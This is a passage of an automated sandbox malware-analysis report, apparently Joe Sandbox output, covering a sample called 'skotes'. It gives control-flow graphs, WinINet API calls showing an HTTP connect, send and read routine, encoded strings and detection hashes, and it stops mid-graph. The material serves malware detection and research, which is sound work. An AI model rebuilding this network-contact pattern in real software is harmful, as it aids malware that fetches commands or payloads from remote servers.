                                                        control_flow_graph 1310 dbbe30-dbbe7c 1311 dbbe82-dbbe86 1310->1311 1312 dbc281-dbc2a6 call dc80c0 1310->1312 1311->1312 1313 dbbe8c-dbbe90 1311->1313 1317 dbc2a8-dbc2b4 1312->1317 1318 dbc2d4-dbc2ec 1312->1318 1313->1312 1316 dbbe96-dbbf2a Sleep InternetOpenW InternetConnectA call dc7a00 call db5c10 1313->1316 1344 dbbf2e-dbbf4a HttpOpenRequestA 1316->1344 1345 dbbf2c 1316->1345 1320 dbc2ca-dbc2d1 call dcd663 1317->1320 1321 dbc2b6-dbc2c4 1317->1321 1322 dbc238-dbc250 1318->1322 1323 dbc2f2-dbc2fe 1318->1323 1320->1318 1321->1320 1325 dbc34f-dbc354 call de6c6a 1321->1325 1329 dbc323-dbc33f call dccff1 1322->1329 1330 dbc256-dbc262 1322->1330 1327 dbc22e-dbc235 call dcd663 1323->1327 1328 dbc304-dbc312 1323->1328 1327->1322 1328->1325 1335 dbc314 1328->1335 1336 dbc319-dbc320 call dcd663 1330->1336 1337 dbc268-dbc276 1330->1337 1335->1327 1336->1329 1337->1325 1343 dbc27c 1337->1343 1343->1336 1347 dbbf7b-dbbfea call dc7a00 call db5c10 call dc7a00 call db5c10 1344->1347 1348 dbbf4c-dbbf5b 1344->1348 1345->1344 1362 dbbfee-dbc004 HttpSendRequestA 1347->1362 1363 dbbfec 1347->1363 1350 dbbf5d-dbbf6b 1348->1350 1351 dbbf71-dbbf78 call dcd663 1348->1351 1350->1351 1351->1347 1364 dbc006-dbc015 1362->1364 1365 dbc035-dbc05d 1362->1365 1363->1362 1366 dbc02b-dbc032 call dcd663 1364->1366 1367 dbc017-dbc025 1364->1367 1368 dbc05f-dbc06e 1365->1368 1369 dbc08e-dbc0af InternetReadFile 1365->1369 1366->1365 1367->1366 1371 dbc070-dbc07e 1368->1371 1372 dbc084-dbc08b call dcd663 1368->1372 1373 dbc0b5 1369->1373 1371->1372 1372->1369 1376 dbc0c0-dbc170 call de4250 1373->1376
                                                        APIs
                                                        • Sleep.KERNEL32(000005DC), ref: 00DBBEB8
                                                        • InternetOpenW.WININET(00E08DC8,00000000,00000000,00000000,00000000), ref: 00DBBEC7
                                                        • InternetConnectA.WININET(00000000,?,00000050,00000000,00000000,00000003,00000000,00000001), ref: 00DBBEEC
                                                        • HttpOpenRequestA.WININET(?,00000000), ref: 00DBBF36
                                                        • HttpSendRequestA.WININET(?,00000000), ref: 00DBBFF5
                                                        • InternetReadFile.WININET(?,?,000003FF,?), ref: 00DBC0A8
                                                        • InternetCloseHandle.WININET(?), ref: 00DBC187
                                                        • InternetCloseHandle.WININET(?), ref: 00DBC18F
                                                        • InternetCloseHandle.WININET(?), ref: 00DBC197
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3756294497.0000000000DB1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00DB0000, based on PE: true
                                                        • Associated: 0000000B.00000002.3756007668.0000000000DB0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3756294497.0000000000E12000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3756945400.0000000000E19000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3757207811.0000000000E1B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3757207811.0000000000FA8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3757207811.000000000108F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3757207811.00000000010BB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3757207811.00000000010C3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3757207811.00000000010D1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3767890839.00000000010D2000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3769279054.0000000001278000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3769407829.000000000127A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_db0000_skotes.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Internet$CloseHandle$HttpOpenRequest$ConnectFileReadSendSleep
                                                        • String ID: 8HJUeIfzLo==$8HJUeMD Lq5=$RE1NXF==$RmNn$invalid stoi argument$stoi argument out of range
                                                        • API String ID: 2167506142-2254971868
                                                        • Opcode ID: 98c6863d747a74610d8275564605b1ee540bd5bae2a1c8237c8956bf57f84464
                                                        • Instruction ID: e32fcce239f697654a46a79f000a217978d9a8adc8eb0f11c25949f9939835a4
                                                        • Opcode Fuzzy Hash: 98c6863d747a74610d8275564605b1ee540bd5bae2a1c8237c8956bf57f84464
                                                        • Instruction Fuzzy Hash: 87B1E4B0610218DBDB24DF28CC85BEDBBA5EF45304F5081A9F50AA72D1DB719AC0CBB5
                                                        Function 00DBE530 Relevance: 16.0, Strings: 12, Instructions: 998COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 1465 dbe530-dbe843 call dc7a00 call db5c10 call dc7a00 call db5c10 call dc9280 call dc8320 call dc8220 call dc8320 call dc7a00 * 3 call dbbe30 call dc7a00 * 2 call db5c10 call db8580 1503 dbea1a-dbea62 1465->1503 1504 dbe8ce-dbe9ec 1465->1504 1503->1504 1508 dbea8f-dbea96 call dcd663 1503->1508 1513 dbea99-dbeab2 call dccff1 1504->1513 1514 dbe9f2-dbe9fe 1504->1514 1508->1513 1514->1508 1515 dbea04-dbea12 1514->1515 1515->1503 1517 dbeab8-dbed97 call de6c6a * 2 call dc7a00 call db5c10 call dc83c0 call dc8220 call dc7a00 call db5c10 call dc83c0 call dc8220 1515->1517 1548 dbed9d-dbee79 1517->1548 1553 dbf5bb-dbf66c call dc80c0 1548->1553 1554 dbf273-dbf28b 1548->1554 1553->1554 1558 dbf699-dbf6a0 call dcd663 1553->1558 1555 dbf6a3-dbf6b6 1554->1555 1556 dbf291-dbf29d 1554->1556 1556->1558 1559 dbf2a3-dbf2b1 1556->1559 1558->1555 1559->1553 1561 dbf6cb-dbf962 call de6c6a call dc7a00 call db5c10 call dc7a00 * 4 call dbe530 call dc80c0 call dc7a00 call dc80c0 * 2 1559->1561 1596 dbf98c-dbf9a5 call dccff1 1561->1596 1597 dbf964-dbf970 1561->1597 1598 dbf982-dbf989 call dcd663 1597->1598 1599 dbf972-dbf980 1597->1599 1598->1596 1599->1598 1601 dbf9ab-dbfb15 call de6c6a call dc7a00 call db5c10 call dc7a00 * 4 call dbe530 1599->1601 1625 dbfb3f-dbfb4e 1601->1625 1626 dbfb17-dbfb23 1601->1626 1627 dbfb35-dbfb3c call dcd663 1626->1627 1628 dbfb25-dbfb33 1626->1628 1627->1625 1628->1627 1629 dbfb4f-dbfc6f call de6c6a call dc7a00 call db9580 call db9230 call dc8320 1628->1629 1644 dbfc70-dbfc75 1629->1644 1644->1644 1645 dbfc77-dc0860 call dc80c0 call dc7a00 * 2 call dbc360 call de6729 call dc7a00 call db5c10 call dc7a00 * 4 call dbe530 1644->1645 1679 dc088a-dc08a5 call dccff1 1645->1679 1680 dc0862-dc086e 1645->1680 1681 dc0880-dc0887 call dcd663 1680->1681 1682 dc0870-dc087e 1680->1682 1681->1679 1682->1681 1684 dc08ce-dc1537 call de6c6a call dc7a00 call db5c10 call dc7a00 * 4 call dbe530 1682->1684
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3756294497.0000000000DB1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00DB0000, based on PE: true
                                                        • Associated: 0000000B.00000002.3756007668.0000000000DB0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3756294497.0000000000E12000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3756945400.0000000000E19000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3757207811.0000000000E1B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3757207811.0000000000FA8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3757207811.000000000108F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3757207811.00000000010BB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3757207811.00000000010C3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3757207811.00000000010D1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3767890839.00000000010D2000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3769279054.0000000001278000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3769407829.000000000127A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_db0000_skotes.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID:
                                                        • String ID: #$111$246122658369$9c9aa5$GnNoc2Hc$L1$MGE+$MQ==$UA==$WDw=$WTs=$WTw=
                                                        • API String ID: 0-734524360
                                                        • Opcode ID: 04c0a994ac2b9b15ec06364ef0578e14f8a8fc752f5501538ec131b9333f20d0
                                                        • Instruction ID: cc62055a4ea3e09be2be4a9f95a20016ddc8a7c77a95fd2743ec2fe67798a5f6
                                                        • Opcode Fuzzy Hash: 04c0a994ac2b9b15ec06364ef0578e14f8a8fc752f5501538ec131b9333f20d0
                                                        • Instruction Fuzzy Hash: 1882B370904288DBEF15EF68C949BDE7FB6EB05304F50859CE805673C2C7759A88CBA2
                                                        Function 00DCD3E2 Relevance: .2, Instructions: 172COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • ___std_exception_copy.LIBVCRUNTIME ref: 00DB24BE
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3756294497.0000000000DB1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00DB0000, based on PE: true
                                                        • Associated: 0000000B.00000002.3756007668.0000000000DB0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3756294497.0000000000E12000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3756945400.0000000000E19000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3757207811.0000000000E1B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3757207811.0000000000FA8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3757207811.000000000108F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3757207811.00000000010BB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3757207811.00000000010C3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3757207811.00000000010D1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3767890839.00000000010D2000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3769279054.0000000001278000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3769407829.000000000127A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_db0000_skotes.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: ___std_exception_copy
                                                        • String ID:
                                                        • API String ID: 2659868963-0
                                                        • Opcode ID: ba9397ba13436b1e981aabf2173c856093aac966ad04ff2d221be90c7ae7c4ad
                                                        • Instruction ID: 8ba82cd70464e84ba4d0358aa524d2a8ecc178f3fad319f744024f64bbf78510
                                                        • Opcode Fuzzy Hash: ba9397ba13436b1e981aabf2173c856093aac966ad04ff2d221be90c7ae7c4ad
                                                        • Instruction Fuzzy Hash: ED518F72904606CFDB15CF59DC85BA9BBB6FB48354F28856EE409EB250E370A944CB60
                                                        Function 00DC3640 Relevance: 51.5, APIs: 1, Strings: 28, Instructions: 761COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 0 dc3640-dc3679 1 dc367f-dc36cf call dc80c0 0->1 2 dc4250-dc4256 0->2 15 dc36d5-dc371b call dc80c0 1->15 16 dc4327 call dc8200 1->16 3 dc4258-dc4264 2->3 4 dc4284-dc429c 2->4 6 dc427a-dc4281 call dcd663 3->6 7 dc4266-dc4274 3->7 8 dc429e-dc42aa 4->8 9 dc42ca-dc42e2 4->9 6->4 7->6 11 dc4363 call de6c6a 7->11 13 dc42ac-dc42ba 8->13 14 dc42c0-dc42c7 call dcd663 8->14 17 dc430c-dc4326 call dccff1 9->17 18 dc42e4-dc42f0 9->18 13->11 13->14 14->9 15->16 34 dc3721-dc375f call dc80c0 15->34 28 dc432c call dc8200 16->28 25 dc4302-dc4309 call dcd663 18->25 26 dc42f2-dc4300 18->26 25->17 26->11 26->25 35 dc4331 call de6c6a 28->35 34->16 40 dc3765-dc37b0 call dc80c0 call dc7a00 call db5c10 34->40 39 dc4336 call de6c6a 35->39 44 dc433b call dc8200 39->44 54 dc37b4-dc37e9 call dc8ba0 40->54 55 dc37b2 40->55 48 dc4340 call de6c6a 44->48 51 dc4345 call de6c6a 48->51 56 dc434a-dc434f call dcc199 51->56 54->28 61 dc37ef-dc381e call dc80c0 54->61 55->54 60 dc4354 call de6c6a 56->60 64 dc4359-dc435e call dcc1d9 60->64 67 dc384f-dc3874 call db98f0 61->67 68 dc3820-dc382f 61->68 64->11 75 dc3d58-dc3d5e 67->75 76 dc387a-dc38e2 call dc7a00 call db5c10 call dc80c0 67->76 70 dc3845-dc384c call dcd663 68->70 71 dc3831-dc383f 68->71 70->67 71->35 71->70 77 dc3d8c-dc3d92 75->77 78 dc3d60-dc3d6c 75->78 110 dc38e4 76->110 111 dc38e6-dc391d call dc9470 76->111 83 dc3d94-dc3da0 77->83 84 dc3dc0-dc3dc6 77->84 80 dc3d6e-dc3d7c 78->80 81 dc3d82-dc3d89 call dcd663 78->81 80->60 80->81 81->77 89 dc3db6-dc3dbd call dcd663 83->89 90 dc3da2-dc3db0 83->90 85 dc3dc8-dc3dd4 84->85 86 dc3df4-dc3e0c 84->86 91 dc3dea-dc3df1 call dcd663 85->91 92 dc3dd6-dc3de4 85->92 93 dc3e3d-dc3e43 86->93 94 dc3e0e-dc3e1d 86->94 89->84 90->60 90->89 91->86 92->60 92->91 93->2 102 dc3e49-dc3e55 93->102 99 dc3e1f-dc3e2d 94->99 100 dc3e33-dc3e3a call dcd663 94->100 99->60 99->100 100->93 107 dc3e5b-dc3e69 102->107 108 dc4246-dc424d call dcd663 102->108 107->60 113 dc3e6f 107->113 108->2 110->111 117 dc391f-dc392a 111->117 118 dc394a-dc3957 111->118 113->108 119 dc392c-dc393a 117->119 120 dc3940-dc3947 call dcd663 117->120 121 dc3988-dc398f 118->121 122 dc3959-dc3968 118->122 119->39 119->120 120->118 126 dc3995-dc39b7 121->126 127 dc3b53-dc3b83 call de75f6 call de8ab6 121->127 124 dc397e-dc3985 call dcd663 122->124 125 dc396a-dc3978 122->125 124->121 125->39 125->124 126->44 131 dc39bd-dc39ef call dc80c0 call dbad70 126->131 127->56 140 dc3b89-dc3b8c 127->140 141 dc3a47-dc3a50 131->141 142 dc39f1-dc39f7 131->142 140->64 143 dc3b92-dc3b95 140->143 146 dc3a81-dc3ac1 call dc7a00 * 2 call db49a0 141->146 147 dc3a52-dc3a61 141->147 144 dc39f9-dc3a05 142->144 145 dc3a25-dc3a44 142->145 143->75 148 dc3b9b 143->148 150 dc3a1b-dc3a22 call dcd663 144->150 151 dc3a07-dc3a15 144->151 145->141 188 dc3b19-dc3b22 146->188 189 dc3ac3-dc3ac9 146->189 152 dc3a77-dc3a7e call dcd663 147->152 153 dc3a63-dc3a71 147->153 154 dc3c8d-dc3d4d call dc80c0 call dc7a00 call db5c10 call dc7a00 * 5 call dc1ec0 148->154 155 dc3e74-dc3f3d call dc80c0 call dc7a00 call db5c10 call dc7a00 * 5 148->155 156 dc3ba2-dc3c67 call dc80c0 call dc7a00 call db5c10 call dc7a00 * 5 148->156 157 dc3f42-dc3fa4 call dc7a00 * 4 call dc2f10 148->157 150->145 151->48 151->150 152->146 153->48 153->152 240 dc3d52 154->240 238 dc3c6b-dc3c7d call dc7a00 call dc08e0 155->238 156->238 157->75 188->127 199 dc3b24-dc3b33 188->199 194 dc3acb-dc3ad7 189->194 195 dc3af7-dc3b16 189->195 201 dc3aed-dc3af4 call dcd663 194->201 202 dc3ad9-dc3ae7 194->202 195->188 206 dc3b49-dc3b50 call dcd663 199->206 207 dc3b35-dc3b43 199->207 201->195 202->51 202->201 206->127 207->51 207->206 244 dc3c82-dc3c88 238->244 240->75 244->75
                                                        APIs
                                                        • std::_Xinvalid_argument.LIBCPMT ref: 00DC434F
                                                          • Part of subcall function 00DC7A00: __Cnd_unregister_at_thread_exit.LIBCPMT ref: 00DC7AEC
                                                          • Part of subcall function 00DC7A00: __Cnd_destroy_in_situ.LIBCPMT ref: 00DC7AF8
                                                          • Part of subcall function 00DC7A00: __Mtx_destroy_in_situ.LIBCPMT ref: 00DC7B01
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3756294497.0000000000DB1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00DB0000, based on PE: true
                                                        • Associated: 0000000B.00000002.3756007668.0000000000DB0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3756294497.0000000000E12000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3756945400.0000000000E19000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3757207811.0000000000E1B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3757207811.0000000000FA8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3757207811.000000000108F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3757207811.00000000010BB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3757207811.00000000010C3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3757207811.00000000010D1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3767890839.00000000010D2000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3769279054.0000000001278000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3769407829.000000000127A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_db0000_skotes.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Cnd_destroy_in_situCnd_unregister_at_thread_exitMtx_destroy_in_situXinvalid_argumentstd::_
                                                        • String ID: 2I0$ 3I3eB==$ GE0$ jS=$"$246122658369$5120$8WI0$9250$93E0$9HQ0$9c9aa5$Fw==$Hykl$KCWUOl==$MGE+$MGI+$V2Te$VXA0$VXQ0$Vmc0$WGS0$WGpm$WX f$aWW0$anE0$invalid stoi argument$stoi argument out of range
                                                        • API String ID: 4234742559-385961153
                                                        • Opcode ID: d66ad56520a0d65f788534defb088ba59c9d9b0125f55bef857c87f713455604
                                                        • Instruction ID: f48bd00bd24ba4d05761f364698be00e2b09c6f03110b39dd18e485cf02df509
                                                        • Opcode Fuzzy Hash: d66ad56520a0d65f788534defb088ba59c9d9b0125f55bef857c87f713455604
                                                        • Instruction Fuzzy Hash: 59520471A002899BDF18EF68CD46FDDBBB5EF45300F54859CE405A7282DB359B848BB2
                                                        Function 00DC47B0 Relevance: 35.5, APIs: 1, Strings: 21, Instructions: 2516COMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 00DC7A00: __Cnd_unregister_at_thread_exit.LIBCPMT ref: 00DC7AEC
                                                          • Part of subcall function 00DC7A00: __Cnd_destroy_in_situ.LIBCPMT ref: 00DC7AF8
                                                          • Part of subcall function 00DC7A00: __Mtx_destroy_in_situ.LIBCPMT ref: 00DC7B01
                                                          • Part of subcall function 00DBBE30: Sleep.KERNEL32(000005DC), ref: 00DBBEB8
                                                          • Part of subcall function 00DBBE30: InternetOpenW.WININET(00E08DC8,00000000,00000000,00000000,00000000), ref: 00DBBEC7
                                                          • Part of subcall function 00DBBE30: InternetConnectA.WININET(00000000,?,00000050,00000000,00000000,00000003,00000000,00000001), ref: 00DBBEEC
                                                          • Part of subcall function 00DBBE30: HttpOpenRequestA.WININET(?,00000000), ref: 00DBBF36
                                                        • std::_Xinvalid_argument.LIBCPMT ref: 00DC4F92
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3756294497.0000000000DB1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00DB0000, based on PE: true
                                                        • Associated: 0000000B.00000002.3756007668.0000000000DB0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3756294497.0000000000E12000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3756945400.0000000000E19000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3757207811.0000000000E1B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3757207811.0000000000FA8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3757207811.000000000108F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3757207811.00000000010BB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3757207811.00000000010C3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3757207811.00000000010D1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3767890839.00000000010D2000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3769279054.0000000001278000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3769407829.000000000127A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_db0000_skotes.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: InternetOpen$Cnd_destroy_in_situCnd_unregister_at_thread_exitConnectHttpMtx_destroy_in_situRequestSleepXinvalid_argumentstd::_
                                                        • String ID: 2I0$ 3I3eB==$ GE0$ jS=$246122658369$8WI0$9250$93E0$9HQ0$9c9aa5$Fw==$KCWUOl==$MGE+$MGI+$VXA0$VXQ0$Vmc0$WGS0$aWW0$anE0$stoi argument out of range
                                                        • API String ID: 4201286991-1982281295
                                                        • Opcode ID: 1380cdb3f027e283007ec54128433533ea3e8db3bef23c96ecc1e53b846fa6f8
                                                        • Instruction ID: 2f9a5a5e4e6dc7212a03c5a16a910c72a13b8a08ef983e6bfa4011540e1bdd2a
                                                        • Opcode Fuzzy Hash: 1380cdb3f027e283007ec54128433533ea3e8db3bef23c96ecc1e53b846fa6f8
                                                        • Instruction Fuzzy Hash: B423F071A002598BEB19DB28CD89B9DBBB6DB81304F5481DCE049A72C6DB359FC4CF61
                                                        Function 00DC2F10 Relevance: 21.9, APIs: 1, Strings: 11, Instructions: 910COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 1019 dc2f10-dc351c call dc7a00 call db5c10 call dc7a00 * 4 call dbe530 1036 dc351e-dc352a 1019->1036 1037 dc354a-dc3562 1019->1037 1038 dc352c-dc353a 1036->1038 1039 dc3540-dc3547 call dcd663 1036->1039 1040 dc3564-dc3570 1037->1040 1041 dc3590-dc35a8 1037->1041 1038->1039 1042 dc3639-dc3679 call de6c6a 1038->1042 1039->1037 1044 dc3586-dc358d call dcd663 1040->1044 1045 dc3572-dc3580 1040->1045 1046 dc35aa-dc35b6 1041->1046 1047 dc35d2-dc35ea 1041->1047 1065 dc367f-dc36cf call dc80c0 1042->1065 1066 dc4250-dc4256 1042->1066 1044->1041 1045->1042 1045->1044 1048 dc35c8-dc35cf call dcd663 1046->1048 1049 dc35b8-dc35c6 1046->1049 1050 dc35ec-dc35f8 1047->1050 1051 dc3614-dc362e call dccff1 1047->1051 1048->1047 1049->1042 1049->1048 1056 dc360a-dc3611 call dcd663 1050->1056 1057 dc35fa-dc3608 1050->1057 1056->1051 1057->1042 1057->1056 1080 dc36d5-dc371b call dc80c0 1065->1080 1081 dc4327 call dc8200 1065->1081 1068 dc4258-dc4264 1066->1068 1069 dc4284-dc429c 1066->1069 1071 dc427a-dc4281 call dcd663 1068->1071 1072 dc4266-dc4274 1068->1072 1073 dc429e-dc42aa 1069->1073 1074 dc42ca-dc42e2 1069->1074 1071->1069 1072->1071 1076 dc4363 call de6c6a 1072->1076 1078 dc42ac-dc42ba 1073->1078 1079 dc42c0-dc42c7 call dcd663 1073->1079 1082 dc430c-dc4326 call dccff1 1074->1082 1083 dc42e4-dc42f0 1074->1083 1078->1076 1078->1079 1079->1074 1080->1081 1099 dc3721-dc375f call dc80c0 1080->1099 1093 dc432c call dc8200 1081->1093 1090 dc4302-dc4309 call dcd663 1083->1090 1091 dc42f2-dc4300 1083->1091 1090->1082 1091->1076 1091->1090 1100 dc4331 call de6c6a 1093->1100 1099->1081 1105 dc3765-dc37b0 call dc80c0 call dc7a00 call db5c10 1099->1105 1104 dc4336 call de6c6a 1100->1104 1109 dc433b call dc8200 1104->1109 1119 dc37b4-dc37e9 call dc8ba0 1105->1119 1120 dc37b2 1105->1120 1113 dc4340 call de6c6a 1109->1113 1116 dc4345 call de6c6a 1113->1116 1121 dc434a-dc434f call dcc199 1116->1121 1119->1093 1126 dc37ef-dc381e call dc80c0 1119->1126 1120->1119 1125 dc4354 call de6c6a 1121->1125 1129 dc4359-dc435e call dcc1d9 1125->1129 1132 dc384f-dc3874 call db98f0 1126->1132 1133 dc3820-dc382f 1126->1133 1129->1076 1140 dc3d58-dc3d5e 1132->1140 1141 dc387a-dc38e2 call dc7a00 call db5c10 call dc80c0 1132->1141 1135 dc3845-dc384c call dcd663 1133->1135 1136 dc3831-dc383f 1133->1136 1135->1132 1136->1100 1136->1135 1142 dc3d8c-dc3d92 1140->1142 1143 dc3d60-dc3d6c 1140->1143 1175 dc38e4 1141->1175 1176 dc38e6-dc391d call dc9470 1141->1176 1148 dc3d94-dc3da0 1142->1148 1149 dc3dc0-dc3dc6 1142->1149 1145 dc3d6e-dc3d7c 1143->1145 1146 dc3d82-dc3d89 call dcd663 1143->1146 1145->1125 1145->1146 1146->1142 1154 dc3db6-dc3dbd call dcd663 1148->1154 1155 dc3da2-dc3db0 1148->1155 1150 dc3dc8-dc3dd4 1149->1150 1151 dc3df4-dc3e0c 1149->1151 1156 dc3dea-dc3df1 call dcd663 1150->1156 1157 dc3dd6-dc3de4 1150->1157 1158 dc3e3d-dc3e43 1151->1158 1159 dc3e0e-dc3e1d 1151->1159 1154->1149 1155->1125 1155->1154 1156->1151 1157->1125 1157->1156 1158->1066 1167 dc3e49-dc3e55 1158->1167 1164 dc3e1f-dc3e2d 1159->1164 1165 dc3e33-dc3e3a call dcd663 1159->1165 1164->1125 1164->1165 1165->1158 1172 dc3e5b-dc3e69 1167->1172 1173 dc4246-dc424d call dcd663 1167->1173 1172->1125 1178 dc3e6f 1172->1178 1173->1066 1175->1176 1182 dc391f-dc392a 1176->1182 1183 dc394a-dc3957 1176->1183 1178->1173 1184 dc392c-dc393a 1182->1184 1185 dc3940-dc3947 call dcd663 1182->1185 1186 dc3988-dc398f 1183->1186 1187 dc3959-dc3968 1183->1187 1184->1104 1184->1185 1185->1183 1191 dc3995-dc39b7 1186->1191 1192 dc3b53-dc3b83 call de75f6 call de8ab6 1186->1192 1189 dc397e-dc3985 call dcd663 1187->1189 1190 dc396a-dc3978 1187->1190 1189->1186 1190->1104 1190->1189 1191->1109 1196 dc39bd-dc39ef call dc80c0 call dbad70 1191->1196 1192->1121 1205 dc3b89-dc3b8c 1192->1205 1206 dc3a47-dc3a50 1196->1206 1207 dc39f1-dc39f7 1196->1207 1205->1129 1208 dc3b92-dc3b95 1205->1208 1211 dc3a81-dc3ac1 call dc7a00 * 2 call db49a0 1206->1211 1212 dc3a52-dc3a61 1206->1212 1209 dc39f9-dc3a05 1207->1209 1210 dc3a25-dc3a44 1207->1210 1208->1140 1213 dc3b9b 1208->1213 1215 dc3a1b-dc3a22 call dcd663 1209->1215 1216 dc3a07-dc3a15 1209->1216 1210->1206 1253 dc3b19-dc3b22 1211->1253 1254 dc3ac3-dc3ac9 1211->1254 1217 dc3a77-dc3a7e call dcd663 1212->1217 1218 dc3a63-dc3a71 1212->1218 1219 dc3c8d-dc3d52 call dc80c0 call dc7a00 call db5c10 call dc7a00 * 5 call dc1ec0 1213->1219 1220 dc3e74-dc3f3d call 